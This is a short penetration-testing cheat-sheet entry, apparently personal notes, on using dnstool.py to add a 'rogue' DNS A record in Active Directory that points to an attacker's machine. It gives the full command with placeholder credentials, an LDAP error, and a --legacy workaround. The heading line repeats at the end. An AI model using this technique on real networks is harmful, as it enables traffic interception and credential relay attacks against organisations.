dnstool.py

This script helps you add DNS records to the domain (which members of Domain Users can by default):

Add a rogue DNS record that points to your attacking box

dnstool.py -u 'tangent\any-valid-AD-user' -p 'Supersecretpassword' -r ROGUE-DNS-RECORD -a add -t A -d IP.OF.ATTACKING.BOX IP.OF.A.DOMAIN-CONTROLLER

If you get an error like this:

[!] LDAP operation failed. Message returned from server: noSuchObject 0000208D: NameErr: DSID-0310023C, problem 2001 (NO_OBJECT), data 0, best match of:
        'CN=MicrosoftDNS,DC=DomainDnsZones,DC=domain,DC=com'

Then rerun the command but add --legacy flag to the command.

Add a rogue DNS record that points to your attacking box​

Add a rogue DNS record that points to your attacking box